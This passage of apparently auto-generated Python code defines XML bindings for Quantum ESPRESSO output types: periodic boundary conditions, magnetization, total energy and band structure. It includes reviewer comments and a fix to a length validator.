def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class infoType
class outputPBCType(GeneratedsSuper):
    """Generated binding for the qes ``outputPBCType`` complex type.

    Carries periodic-boundary-condition output: one optional string child
    element, ``assume_isolated``.
    NOTE(review): auto-generated (generateDS-style) code; serialization byte
    output and statement order are the contract — change via the generator.
    """
    subclass = None
    superclass = None
    def __init__(self, assume_isolated=None):
        self.original_tagname_ = None
        self.assume_isolated = assume_isolated
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one is available, else this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, outputPBCType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if outputPBCType.subclass:
            return outputPBCType.subclass(*args_, **kwargs_)
        else:
            return outputPBCType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_assume_isolated(self): return self.assume_isolated
    def set_assume_isolated(self, assume_isolated): self.assume_isolated = assume_isolated
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.assume_isolated is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='outputPBCType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as XML to *outfile*, indented to *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('outputPBCType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name this element was originally parsed with.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='outputPBCType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='outputPBCType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='outputPBCType'):
        # No XML attributes are defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='outputPBCType', fromsubclass_=False, pretty_print=True):
        """Write the optional assume_isolated child element."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.assume_isolated is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:assume_isolated>%s</qes:assume_isolated>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.assume_isolated), input_name='assume_isolated')), eol_))
    def build(self, node):
        """Populate this object from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes are defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* into the matching attribute."""
        if nodeName_ == 'assume_isolated':
            assume_isolated_ = child_.text
            assume_isolated_ = self.gds_validate_string(assume_isolated_, node, 'assume_isolated')
            self.assume_isolated = assume_isolated_
# end class outputPBCType
class magnetizationType(GeneratedsSuper):
    """Generated binding for the qes ``magnetizationType`` complex type.

    Child elements: lsda / noncolin / spinorbit / do_magnetization are
    booleans; total / absolute are doubles (units not shown here —
    presumably Bohr magnetons per cell; confirm against the qes schema).
    NOTE(review): auto-generated (generateDS-style) code; serialization byte
    output and statement order are the contract — change via the generator.
    """
    subclass = None
    superclass = None
    def __init__(self, lsda=None, noncolin=None, spinorbit=None, total=None, absolute=None, do_magnetization=None):
        self.original_tagname_ = None
        self.lsda = lsda
        self.noncolin = noncolin
        self.spinorbit = spinorbit
        self.total = total
        self.absolute = absolute
        self.do_magnetization = do_magnetization
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one is available, else this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, magnetizationType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if magnetizationType.subclass:
            return magnetizationType.subclass(*args_, **kwargs_)
        else:
            return magnetizationType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_lsda(self): return self.lsda
    def set_lsda(self, lsda): self.lsda = lsda
    def get_noncolin(self): return self.noncolin
    def set_noncolin(self, noncolin): self.noncolin = noncolin
    def get_spinorbit(self): return self.spinorbit
    def set_spinorbit(self, spinorbit): self.spinorbit = spinorbit
    def get_total(self): return self.total
    def set_total(self, total): self.total = total
    def get_absolute(self): return self.absolute
    def set_absolute(self, absolute): self.absolute = absolute
    def get_do_magnetization(self): return self.do_magnetization
    def set_do_magnetization(self, do_magnetization): self.do_magnetization = do_magnetization
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.lsda is not None or
            self.noncolin is not None or
            self.spinorbit is not None or
            self.total is not None or
            self.absolute is not None or
            self.do_magnetization is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='magnetizationType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as XML to *outfile*, indented to *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('magnetizationType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name this element was originally parsed with.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='magnetizationType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='magnetizationType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='magnetizationType'):
        # No XML attributes are defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='magnetizationType', fromsubclass_=False, pretty_print=True):
        """Write each non-None child element, in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.lsda is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:lsda>%s</qes:lsda>%s' % (self.gds_format_boolean(self.lsda, input_name='lsda'), eol_))
        if self.noncolin is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:noncolin>%s</qes:noncolin>%s' % (self.gds_format_boolean(self.noncolin, input_name='noncolin'), eol_))
        if self.spinorbit is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spinorbit>%s</qes:spinorbit>%s' % (self.gds_format_boolean(self.spinorbit, input_name='spinorbit'), eol_))
        if self.total is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:total>%s</qes:total>%s' % (self.gds_format_double(self.total, input_name='total'), eol_))
        if self.absolute is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:absolute>%s</qes:absolute>%s' % (self.gds_format_double(self.absolute, input_name='absolute'), eol_))
        if self.do_magnetization is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:do_magnetization>%s</qes:do_magnetization>%s' % (self.gds_format_boolean(self.do_magnetization, input_name='do_magnetization'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes are defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* into the matching attribute.

        Booleans accept 'true'/'1'/'false'/'0'; floats must parse with
        float(); anything else raises a parse error.
        """
        if nodeName_ == 'lsda':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'lsda')
            self.lsda = ival_
        elif nodeName_ == 'noncolin':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'noncolin')
            self.noncolin = ival_
        elif nodeName_ == 'spinorbit':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'spinorbit')
            self.spinorbit = ival_
        elif nodeName_ == 'total' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'total')
            self.total = fval_
        elif nodeName_ == 'absolute' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'absolute')
            self.absolute = fval_
        elif nodeName_ == 'do_magnetization':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
                ival_ = False
            else:
                raise_parse_error(child_, 'requires boolean')
            ival_ = self.gds_validate_boolean(ival_, node, 'do_magnetization')
            self.do_magnetization = ival_
# end class magnetizationType
class total_energyType(GeneratedsSuper):
    """Generated binding for the qes ``total_energyType`` complex type.

    All children are optional doubles: the total energy (etot) and its
    contributions (eband, ehart, vtxc, etxc, ewald, demet, efieldcorr,
    potentiostat_contr, gatefield_contr).  Units are not visible here —
    presumably Hartree; confirm against the qes schema.
    NOTE(review): auto-generated (generateDS-style) code; serialization byte
    output and statement order are the contract — change via the generator.
    """
    subclass = None
    superclass = None
    def __init__(self, etot=None, eband=None, ehart=None, vtxc=None, etxc=None, ewald=None, demet=None, efieldcorr=None, potentiostat_contr=None, gatefield_contr=None):
        self.original_tagname_ = None
        self.etot = etot
        self.eband = eband
        self.ehart = ehart
        self.vtxc = vtxc
        self.etxc = etxc
        self.ewald = ewald
        self.demet = demet
        self.efieldcorr = efieldcorr
        self.potentiostat_contr = potentiostat_contr
        self.gatefield_contr = gatefield_contr
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one is available, else this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, total_energyType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if total_energyType.subclass:
            return total_energyType.subclass(*args_, **kwargs_)
        else:
            return total_energyType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_etot(self): return self.etot
    def set_etot(self, etot): self.etot = etot
    def get_eband(self): return self.eband
    def set_eband(self, eband): self.eband = eband
    def get_ehart(self): return self.ehart
    def set_ehart(self, ehart): self.ehart = ehart
    def get_vtxc(self): return self.vtxc
    def set_vtxc(self, vtxc): self.vtxc = vtxc
    def get_etxc(self): return self.etxc
    def set_etxc(self, etxc): self.etxc = etxc
    def get_ewald(self): return self.ewald
    def set_ewald(self, ewald): self.ewald = ewald
    def get_demet(self): return self.demet
    def set_demet(self, demet): self.demet = demet
    def get_efieldcorr(self): return self.efieldcorr
    def set_efieldcorr(self, efieldcorr): self.efieldcorr = efieldcorr
    def get_potentiostat_contr(self): return self.potentiostat_contr
    def set_potentiostat_contr(self, potentiostat_contr): self.potentiostat_contr = potentiostat_contr
    def get_gatefield_contr(self): return self.gatefield_contr
    def set_gatefield_contr(self, gatefield_contr): self.gatefield_contr = gatefield_contr
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.etot is not None or
            self.eband is not None or
            self.ehart is not None or
            self.vtxc is not None or
            self.etxc is not None or
            self.ewald is not None or
            self.demet is not None or
            self.efieldcorr is not None or
            self.potentiostat_contr is not None or
            self.gatefield_contr is not None
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='total_energyType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as XML to *outfile*, indented to *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('total_energyType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name this element was originally parsed with.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='total_energyType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='total_energyType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='total_energyType'):
        # No XML attributes are defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='total_energyType', fromsubclass_=False, pretty_print=True):
        """Write each non-None energy contribution, in schema order."""
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.etot is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:etot>%s</qes:etot>%s' % (self.gds_format_double(self.etot, input_name='etot'), eol_))
        if self.eband is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:eband>%s</qes:eband>%s' % (self.gds_format_double(self.eband, input_name='eband'), eol_))
        if self.ehart is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ehart>%s</qes:ehart>%s' % (self.gds_format_double(self.ehart, input_name='ehart'), eol_))
        if self.vtxc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:vtxc>%s</qes:vtxc>%s' % (self.gds_format_double(self.vtxc, input_name='vtxc'), eol_))
        if self.etxc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:etxc>%s</qes:etxc>%s' % (self.gds_format_double(self.etxc, input_name='etxc'), eol_))
        if self.ewald is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:ewald>%s</qes:ewald>%s' % (self.gds_format_double(self.ewald, input_name='ewald'), eol_))
        if self.demet is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:demet>%s</qes:demet>%s' % (self.gds_format_double(self.demet, input_name='demet'), eol_))
        if self.efieldcorr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:efieldcorr>%s</qes:efieldcorr>%s' % (self.gds_format_double(self.efieldcorr, input_name='efieldcorr'), eol_))
        if self.potentiostat_contr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:potentiostat_contr>%s</qes:potentiostat_contr>%s' % (self.gds_format_double(self.potentiostat_contr, input_name='potentiostat_contr'), eol_))
        if self.gatefield_contr is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:gatefield_contr>%s</qes:gatefield_contr>%s' % (self.gds_format_double(self.gatefield_contr, input_name='gatefield_contr'), eol_))
    def build(self, node):
        """Populate this object from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes are defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* into the matching float attribute.

        Empty-text elements are skipped (the `and child_.text` guards);
        unparseable values raise a parse error.
        """
        if nodeName_ == 'etot' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'etot')
            self.etot = fval_
        elif nodeName_ == 'eband' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'eband')
            self.eband = fval_
        elif nodeName_ == 'ehart' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ehart')
            self.ehart = fval_
        elif nodeName_ == 'vtxc' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'vtxc')
            self.vtxc = fval_
        elif nodeName_ == 'etxc' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'etxc')
            self.etxc = fval_
        elif nodeName_ == 'ewald' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'ewald')
            self.ewald = fval_
        elif nodeName_ == 'demet' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'demet')
            self.demet = fval_
        elif nodeName_ == 'efieldcorr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'efieldcorr')
            self.efieldcorr = fval_
        elif nodeName_ == 'potentiostat_contr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'potentiostat_contr')
            self.potentiostat_contr = fval_
        elif nodeName_ == 'gatefield_contr' and child_.text:
            sval_ = child_.text
            try:
                fval_ = float(sval_)
            except (TypeError, ValueError) as exp:
                raise_parse_error(child_, 'requires float or double: %s' % exp)
            fval_ = self.gds_validate_float(fval_, node, 'gatefield_contr')
            self.gatefield_contr = fval_
# end class total_energyType
class band_structureType(GeneratedsSuper):
    """Generated binding for the qes ``band_structureType`` complex type.

    Aggregates band-structure output: spin flags (lsda/noncolin/spinorbit),
    band counts (nbnd, nbnd_up, nbnd_dw), electron count (nelec), Fermi
    level data, the starting k-point set, occupations/smearing settings and
    the per-k-point Kohn-Sham energies (ks_energies, a list).
    NOTE(review): auto-generated (generateDS-style) code; one fix applied to
    validate_d2vectorType (see below) — port it to the generator/schema.
    """
    subclass = None
    superclass = None
    def __init__(self, lsda=None, noncolin=None, spinorbit=None, nbnd=None, nbnd_up=None, nbnd_dw=None, nelec=None, num_of_atomic_wfc=None, wf_collected=None, fermi_energy=None, highestOccupiedLevel=None, two_fermi_energies=None, starting_k_points=None, nks=None, occupations_kind=None, smearing=None, ks_energies=None):
        self.original_tagname_ = None
        self.lsda = lsda
        self.noncolin = noncolin
        self.spinorbit = spinorbit
        self.nbnd = nbnd
        self.nbnd_up = nbnd_up
        self.nbnd_dw = nbnd_dw
        self.nelec = nelec
        self.num_of_atomic_wfc = num_of_atomic_wfc
        self.wf_collected = wf_collected
        self.fermi_energy = fermi_energy
        self.highestOccupiedLevel = highestOccupiedLevel
        self.two_fermi_energies = two_fermi_energies
        self.validate_d2vectorType(self.two_fermi_energies)
        self.starting_k_points = starting_k_points
        self.nks = nks
        self.occupations_kind = occupations_kind
        self.smearing = smearing
        # Avoid a shared mutable default for the repeated element.
        if ks_energies is None:
            self.ks_energies = []
        else:
            self.ks_energies = ks_energies
    def factory(*args_, **kwargs_):
        # Instantiate a registered subclass when one is available, else this class.
        if CurrentSubclassModule_ is not None:
            subclass = getSubclassFromModule_(
                CurrentSubclassModule_, band_structureType)
            if subclass is not None:
                return subclass(*args_, **kwargs_)
        if band_structureType.subclass:
            return band_structureType.subclass(*args_, **kwargs_)
        else:
            return band_structureType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_lsda(self): return self.lsda
    def set_lsda(self, lsda): self.lsda = lsda
    def get_noncolin(self): return self.noncolin
    def set_noncolin(self, noncolin): self.noncolin = noncolin
    def get_spinorbit(self): return self.spinorbit
    def set_spinorbit(self, spinorbit): self.spinorbit = spinorbit
    def get_nbnd(self): return self.nbnd
    def set_nbnd(self, nbnd): self.nbnd = nbnd
    def get_nbnd_up(self): return self.nbnd_up
    def set_nbnd_up(self, nbnd_up): self.nbnd_up = nbnd_up
    def get_nbnd_dw(self): return self.nbnd_dw
    def set_nbnd_dw(self, nbnd_dw): self.nbnd_dw = nbnd_dw
    def get_nelec(self): return self.nelec
    def set_nelec(self, nelec): self.nelec = nelec
    def get_num_of_atomic_wfc(self): return self.num_of_atomic_wfc
    def set_num_of_atomic_wfc(self, num_of_atomic_wfc): self.num_of_atomic_wfc = num_of_atomic_wfc
    def get_wf_collected(self): return self.wf_collected
    def set_wf_collected(self, wf_collected): self.wf_collected = wf_collected
    def get_fermi_energy(self): return self.fermi_energy
    def set_fermi_energy(self, fermi_energy): self.fermi_energy = fermi_energy
    def get_highestOccupiedLevel(self): return self.highestOccupiedLevel
    def set_highestOccupiedLevel(self, highestOccupiedLevel): self.highestOccupiedLevel = highestOccupiedLevel
    def get_two_fermi_energies(self): return self.two_fermi_energies
    def set_two_fermi_energies(self, two_fermi_energies): self.two_fermi_energies = two_fermi_energies
    def get_starting_k_points(self): return self.starting_k_points
    def set_starting_k_points(self, starting_k_points): self.starting_k_points = starting_k_points
    def get_nks(self): return self.nks
    def set_nks(self, nks): self.nks = nks
    def get_occupations_kind(self): return self.occupations_kind
    def set_occupations_kind(self, occupations_kind): self.occupations_kind = occupations_kind
    def get_smearing(self): return self.smearing
    def set_smearing(self, smearing): self.smearing = smearing
    def get_ks_energies(self): return self.ks_energies
    def set_ks_energies(self, ks_energies): self.ks_energies = ks_energies
    def add_ks_energies(self, value): self.ks_energies.append(value)
    def insert_ks_energies_at(self, index, value): self.ks_energies.insert(index, value)
    def replace_ks_energies_at(self, index, value): self.ks_energies[index] = value
    def validate_d2vectorType(self, value):
        # Validate type d2vectorType, a restriction on double: a
        # whitespace-separated list of exactly two doubles.
        # FIX(review): the generated check was `len(str(value)) != 2`, which
        # counts *characters* of the value's string form, so every valid
        # two-component vector (e.g. "0.1 0.2") spuriously warned.  Count
        # the components instead, accepting either the raw element text
        # (str) or an already-split sequence.
        if value is not None and Validate_simpletypes_:
            components = value.split() if isinstance(value, str) else value
            if len(components) != 2:
                warnings_.warn('Value "%(value)s" does not match xsd length restriction on d2vectorType' % {"value" : value} )
    def hasContent_(self):
        # True when at least one child element would be serialized.
        if (
            self.lsda is not None or
            self.noncolin is not None or
            self.spinorbit is not None or
            self.nbnd is not None or
            self.nbnd_up is not None or
            self.nbnd_dw is not None or
            self.nelec is not None or
            self.num_of_atomic_wfc is not None or
            self.wf_collected is not None or
            self.fermi_energy is not None or
            self.highestOccupiedLevel is not None or
            self.two_fermi_energies is not None or
            self.starting_k_points is not None or
            self.nks is not None or
            self.occupations_kind is not None or
            self.smearing is not None or
            self.ks_energies
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespaceprefix_='qes:', name_='band_structureType', namespacedef_='xmlns:qes="http://www.quantum-espresso.org/ns/qes/qes-1.0"', pretty_print=True):
        """Write this object as XML to *outfile*, indented to *level*."""
        imported_ns_def_ = GenerateDSNamespaceDefs_.get('band_structureType')
        if imported_ns_def_ is not None:
            namespacedef_ = imported_ns_def_
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        # Prefer the tag name this element was originally parsed with.
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespaceprefix_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespaceprefix_, name_='band_structureType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespaceprefix_='qes:', name_='band_structureType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespaceprefix_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespaceprefix_='qes:', name_='band_structureType'):
        # No XML attributes are defined for this type.
        pass
    def exportChildren(self, outfile, level, namespaceprefix_='qes:', name_='band_structureType', fromsubclass_=False, pretty_print=True):
        """Write each non-None child element, in schema order.

        Complex children (starting_k_points, occupations_kind, smearing and
        each ks_energies entry) delegate to their own export().
        """
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.lsda is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:lsda>%s</qes:lsda>%s' % (self.gds_format_boolean(self.lsda, input_name='lsda'), eol_))
        if self.noncolin is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:noncolin>%s</qes:noncolin>%s' % (self.gds_format_boolean(self.noncolin, input_name='noncolin'), eol_))
        if self.spinorbit is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:spinorbit>%s</qes:spinorbit>%s' % (self.gds_format_boolean(self.spinorbit, input_name='spinorbit'), eol_))
        if self.nbnd is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nbnd>%s</qes:nbnd>%s' % (self.gds_format_integer(self.nbnd, input_name='nbnd'), eol_))
        if self.nbnd_up is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nbnd_up>%s</qes:nbnd_up>%s' % (self.gds_format_integer(self.nbnd_up, input_name='nbnd_up'), eol_))
        if self.nbnd_dw is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nbnd_dw>%s</qes:nbnd_dw>%s' % (self.gds_format_integer(self.nbnd_dw, input_name='nbnd_dw'), eol_))
        if self.nelec is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nelec>%s</qes:nelec>%s' % (self.gds_format_double(self.nelec, input_name='nelec'), eol_))
        if self.num_of_atomic_wfc is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:num_of_atomic_wfc>%s</qes:num_of_atomic_wfc>%s' % (self.gds_format_integer(self.num_of_atomic_wfc, input_name='num_of_atomic_wfc'), eol_))
        if self.wf_collected is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:wf_collected>%s</qes:wf_collected>%s' % (self.gds_format_boolean(self.wf_collected, input_name='wf_collected'), eol_))
        if self.fermi_energy is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:fermi_energy>%s</qes:fermi_energy>%s' % (self.gds_format_double(self.fermi_energy, input_name='fermi_energy'), eol_))
        if self.highestOccupiedLevel is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:highestOccupiedLevel>%s</qes:highestOccupiedLevel>%s' % (self.gds_format_double(self.highestOccupiedLevel, input_name='highestOccupiedLevel'), eol_))
        if self.two_fermi_energies is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:two_fermi_energies>%s</qes:two_fermi_energies>%s' % (self.gds_format_double_list(self.two_fermi_energies, input_name='two_fermi_energies'), eol_))
        if self.starting_k_points is not None:
            self.starting_k_points.export(outfile, level, namespaceprefix_, name_='starting_k_points', pretty_print=pretty_print)
        if self.nks is not None:
            showIndent(outfile, level, pretty_print)
            outfile.write('<qes:nks>%s</qes:nks>%s' % (self.gds_format_integer(self.nks, input_name='nks'), eol_))
        if self.occupations_kind is not None:
            self.occupations_kind.export(outfile, level, namespaceprefix_, name_='occupations_kind', pretty_print=pretty_print)
        if self.smearing is not None:
            self.smearing.export(outfile, level, namespaceprefix_, name_='smearing', pretty_print=pretty_print)
        for ks_energies_ in self.ks_energies:
            ks_energies_.export(outfile, level, namespaceprefix_, name_='ks_energies', pretty_print=pretty_print)
    def build(self, node):
        """Populate this object from an ElementTree *node*; return self."""
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        # No XML attributes are defined for this type.
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        """Parse one child element of *node* into the matching attribute.

        Booleans accept 'true'/'1'/'false'/'0'; integer children enforce
        their xsd range facets (positiveInteger / nonNegativeInteger);
        complex children are built via their generated classes.
        """
        if nodeName_ == 'lsda':
            sval_ = child_.text
            if sval_ in ('true', '1'):
                ival_ = True
            elif sval_ in ('false', '0'):
